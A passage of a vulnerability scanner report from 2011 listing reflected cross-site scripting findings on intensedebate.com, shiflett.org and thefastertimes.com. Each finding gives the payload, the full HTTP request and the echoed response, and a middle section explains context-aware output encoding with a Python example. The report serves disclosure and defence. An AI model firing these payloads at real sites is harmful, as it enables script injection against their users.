   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/images/avatar-compact.png/?eef9c'><script>alert(1)</script>96c8bfb1934=1'>
...[SNIP]...

1.74. http://s.intensedebate.com/images/twitter-favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /images/twitter-favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 318e9'><script>alert(1)</script>74331322a03 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/twitter-favicon.ico318e9'><script>alert(1)</script>74331322a03 HTTP/1.1
Host: s.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 31 Jan 2011 20:48:24 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Content-Length: 4720

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/images/twitter-favicon.ico318e9'><script>alert(1)</script>74331322a03'>
...[SNIP]...

1.75. http://s.intensedebate.com/js/idm-combined.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /js/idm-combined.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eb51c'><script>alert(1)</script>74206c45e41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/idm-combined.jseb51c'><script>alert(1)</script>74206c45e41 HTTP/1.1
Host: s.intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1; __utmc=239309019; __qca=P0-1269071080-1296494784940; __utmb=239309019.1.10.1296494785;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 31 Jan 2011 20:41:54 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Connection: close
Content-Length: 4797

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/idm-combined.jseb51c'><script>alert(1)</script>74206c45e41'>
...[SNIP]...

1.76. http://shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shiflett.org
Path:   /articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4a414<script>alert(1)</script>cf5cd8e3bbc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The reflection point here is a Zend_Controller_Dispatcher_Exception dump printed inside a pre element: the exception message truncates the unknown controller name, but the _requestUri property further down echoes the full request path. Because the dump is served as text/html with status 200, the browser parses the injected tags as markup; the verbose exception output is also an information exposure in its own right (framework and request internals) and would normally be disabled outside development.

Request

GET /articles4a414<script>alert(1)</script>cf5cd8e3bbc/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1
Host: shiflett.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:44:12 GMT
Server: Apache/2.2.11 (Ubuntu) DAV/2 SVN/1.5.4 mod_ssl/2.2.11 OpenSSL/0.9.8g PHP/5.3.2
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=df60ff40e08eff0677e1afb71feea2d3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5024
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>Zend_Controller_Dispatcher_Exception Object
(
[message:protected] => "articles4a414<script>alert(1)<" controller does not exist
[string:Exception:private] =>
[code:protected] => 0

...[SNIP]...
(
[0] => Zend_Controller_Request_Http Object
(
[_requestUri:protected] => /articles4a414<script>alert(1)</script>cf5cd8e3bbc/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d
...[SNIP]...
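The fix for every reflection shape in this report, including the plain-text echo just shown and the JavaScript-string case in 1.67, is the same principle: encode the untrusted value for the exact context it is written into, innermost context first. The Python below is an added example, not code from any of the affected applications; the payload strings are the cores of the scanner payloads quoted in this report. The last encoder is an assumption: a model of the behaviour the pcgro.com response exhibits (the ampersand in the query string came back as &amp; while the single quote was untouched), included to show why that kind of filter cannot protect a JavaScript string literal.

```python
"""Context-aware output encoding for the reflection contexts in this report.

Added example, not code from any site in the report.  Each encoder returns the
form of an untrusted value that is safe to write into the named context.  The
last encoder models the filter behaviour visible in the pcgro.com response
(assumption: an htmlspecialchars()-style filter that leaves ' alone).
"""
import html
from urllib.parse import quote

TEXT_PAYLOAD = "<script>alert(1)</script>"       # shiflett.org: plain text between tags
ATTR_DQ_PAYLOAD = '"><script>alert(1)</script>'  # network.realmedia.com: "..." attribute
ATTR_SQ_PAYLOAD = "'><script>alert(1)</script>"  # s.intensedebate.com: URL inside '...' attribute
JS_PAYLOAD = "';alert(1)//"                      # pcgro.com: '...' JavaScript string (decoded)


def for_html_text(value):
    """Data between tags: entity-encode & < > (quotes are harmless here)."""
    return html.escape(value, quote=False)


def for_html_attr(value):
    """Data inside a quoted attribute: also encode both quote characters."""
    return html.escape(value, quote=True)


def for_url_then_attr(value):
    """Data that becomes a URL component inside an attribute (the back= value):
    percent-encode for the inner URL context first, then entity-encode for the
    attribute.  Encode inner-to-outer because the browser decodes outer-to-inner."""
    return html.escape(quote(value, safe=""), quote=True)


def for_js_string(value):
    """Data inside a JavaScript string literal: \\xHH / \\uHHHH-escape every
    character except ASCII alphanumerics, so no quote, backslash, slash or
    angle bracket survives (this also defuses an embedded </script>)."""
    out = []
    for ch in value:
        cp = ord(ch)
        if cp < 128 and ch.isalnum():
            out.append(ch)
        elif cp < 256:
            out.append(f"\\x{cp:02x}")
        else:
            out.append(f"\\u{cp:04x}")
    return "".join(out)


def entity_encode_without_single_quote(value):
    """Model of the filter the pcgro.com response shows: & < > and the double
    quote become entities, the single quote does not.  Pitfall only."""
    return (value.replace("&", "&amp;").replace("<", "&lt;")
                 .replace(">", "&gt;").replace('"', "&quot;"))


# Per context, the character whose raw survival means the payload broke out.
BREAKOUT = {
    "text": "<",
    "attr-dq": '"',
    "url-in-attr-sq": "'",
    "js-sq": "'",
    "js-sq-pitfall": "'",
}


def demo():
    """Encode each payload for its context; return name -> (encoded, neutralised)."""
    cases = {
        "text": (for_html_text, TEXT_PAYLOAD),
        "attr-dq": (for_html_attr, ATTR_DQ_PAYLOAD),
        "url-in-attr-sq": (for_url_then_attr, ATTR_SQ_PAYLOAD),
        "js-sq": (for_js_string, JS_PAYLOAD),
        "js-sq-pitfall": (entity_encode_without_single_quote, JS_PAYLOAD),
    }
    results = {}
    for name, (encoder, payload) in cases.items():
        encoded = encoder(payload)
        results[name] = (encoded, BREAKOUT[name] not in encoded)
    return results


if __name__ == "__main__":
    for name, (encoded, ok) in demo().items():
        print(f"{'safe' if ok else 'XSS '} {name:15s} {encoded}")
```

The pitfall case is the one to remember from entry 1.67: an entity filter that is perfectly adequate for the attribute echoes on realmedia.com and intensedebate.com leaves the pcgro.com string literal open, because the one character that matters there is the single quote and, inside a script element, entities would not be decoded anyway. For the shiflett.org entries the text encoder is sufficient, but the exception dump should not reach production in the first place.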

1.77. http://shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shiflett.org
Path:   /articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a20e7<script>alert(1)</script>542bd57d083 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articlesa20e7<script>alert(1)</script>542bd57d083/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1
Host: shiflett.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:44:13 GMT
Server: Apache/2.2.11 (Ubuntu) DAV/2 SVN/1.5.4 mod_ssl/2.2.11 OpenSSL/0.9.8g PHP/5.3.2
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=770c495619ef96fd0a5bb62f44001a4c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5024
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>Zend_Controller_Dispatcher_Exception Object
(
[message:protected] => "articlesa20e7<script>alert(1)<" controller does not exist
[string:Exception:private] =>
[code:protected] => 0

...[SNIP]...
(
[0] => Zend_Controller_Request_Http Object
(
[_requestUri:protected] => /articlesa20e7<script>alert(1)</script>542bd57d083/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d
...[SNIP]...

1.78. http://shiflett.org/images/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shiflett.org
Path:   /images/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 44b7b<script>alert(1)</script>9955f5d98cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images44b7b<script>alert(1)</script>9955f5d98cd/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1
Host: shiflett.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:43:59 GMT
Server: Apache/2.2.11 (Ubuntu) DAV/2 SVN/1.5.4 mod_ssl/2.2.11 OpenSSL/0.9.8g PHP/5.3.2
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=c92e2ca30a9726b7dd7291a656f9b197; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5284
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>Zend_Controller_Dispatcher_Exception Object
(
[message:protected] => "images44b7b<script>alert(1)<" controller does not exist
[string:Exception:private] =>
[code:protected] => 0

...[SNIP]...
(
[0] => Zend_Controller_Request_Http Object
(
[_requestUri:protected] => /images44b7b<script>alert(1)</script>9955f5d98cd/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26s
...[SNIP]...

1.79. http://shiflett.org/images/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shiflett.org
Path:   /images/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3e40d<script>alert(1)</script>cfd456afc3e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/foiling_cross_site_attacks_2.png3e40d<script>alert(1)</script>cfd456afc3e/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1
Host: shiflett.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:43:59 GMT
Server: Apache/2.2.11 (Ubuntu) DAV/2 SVN/1.5.4 mod_ssl/2.2.11 OpenSSL/0.9.8g PHP/5.3.2
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=cbdc6372d279cc054078897e548799a9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5240
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>Zend_Controller_Dispatcher_Exception Object
(
[message:protected] => "images" controller does not exist
[string:Exception:private] =>
[code:protected] => 0
[file:protected] => /w
...[SNIP]...
[0] => Zend_Controller_Request_Http Object
(
[_requestUri:protected] => /images/foiling_cross_site_attacks_2.png3e40d<script>alert(1)</script>cfd456afc3e/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x
...[SNIP]...

1.80. http://shiflett.org/images/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shiflett.org
Path:   /images/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e77d2<script>alert(1)</script>ed10b7483a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imagese77d2<script>alert(1)</script>ed10b7483a3/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1
Host: shiflett.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:44:00 GMT
Server: Apache/2.2.11 (Ubuntu) DAV/2 SVN/1.5.4 mod_ssl/2.2.11 OpenSSL/0.9.8g PHP/5.3.2
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=e6d3fc5262330322a6c6113fe3a36a24; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5284
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>Zend_Controller_Dispatcher_Exception Object
(
[message:protected] => "imagese77d2<script>alert(1)<" controller does not exist
[string:Exception:private] =>
[code:protected] => 0

...[SNIP]...
(
[0] => Zend_Controller_Request_Http Object
(
[_requestUri:protected] => /imagese77d2<script>alert(1)</script>ed10b7483a3/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26s
...[SNIP]...

1.81. http://shiflett.org/images/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shiflett.org
Path:   /images/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3fc2c<script>alert(1)</script>ca3d970e655 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/foiling_cross_site_attacks_2.png3fc2c<script>alert(1)</script>ca3d970e655/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1
Host: shiflett.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:44:01 GMT
Server: Apache/2.2.11 (Ubuntu) DAV/2 SVN/1.5.4 mod_ssl/2.2.11 OpenSSL/0.9.8g PHP/5.3.2
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=50bf4b0dd4d7f6b8ef5eb76e7dcd811d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5240
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>Zend_Controller_Dispatcher_Exception Object
(
[message:protected] => "images" controller does not exist
[string:Exception:private] =>
[code:protected] => 0
[file:protected] => /w
...[SNIP]...
[0] => Zend_Controller_Request_Http Object
(
[_requestUri:protected] => /images/foiling_cross_site_attacks_2.png3fc2c<script>alert(1)</script>ca3d970e655/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x
...[SNIP]...

1.82. http://thefastertimes.com/about/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /about/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8001"><script>alert(1)</script>a1b8a31b6e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8001\"><script>alert(1)</script>a1b8a31b6e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/?f8001"><script>alert(1)</script>a1b8a31b6e6=1 HTTP/1.1
Host: thefastertimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMDAxMzEwMCA6IDMgTTBhSjpvKzIyMG4gIDIxbjE%3D--412cad7633dbe777e841f2348764ef1fb7404c5d%7C29a20f8a34e3d1dc0bdf48916623bd44; __utmc=57436015; __qca=P0-2030699969-1296504545420; __utmb=57436015.2.10.1296504542;

Response

HTTP/1.0 200 OK
Date: Mon, 31 Jan 2011 20:52:00 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
Vary: Cookie
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/about/?f8001\"><script>alert(1)</script>a1b8a31b6e6=1" />
...[SNIP]...

1.83. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30f95"><script>alert(1)</script>ba9b92ed14b was submitted in the REST URL parameter 1. This input was echoed as 30f95\"><script>alert(1)</script>ba9b92ed14b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95"><script>alert(1)</script>ba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp HTTP/1.1
Host: thefastertimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 31 Jan 2011 18:01:37 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; path=/
Vary: Cookie
X-Pingback: http://thefastertimes.com/xmlrpc.php
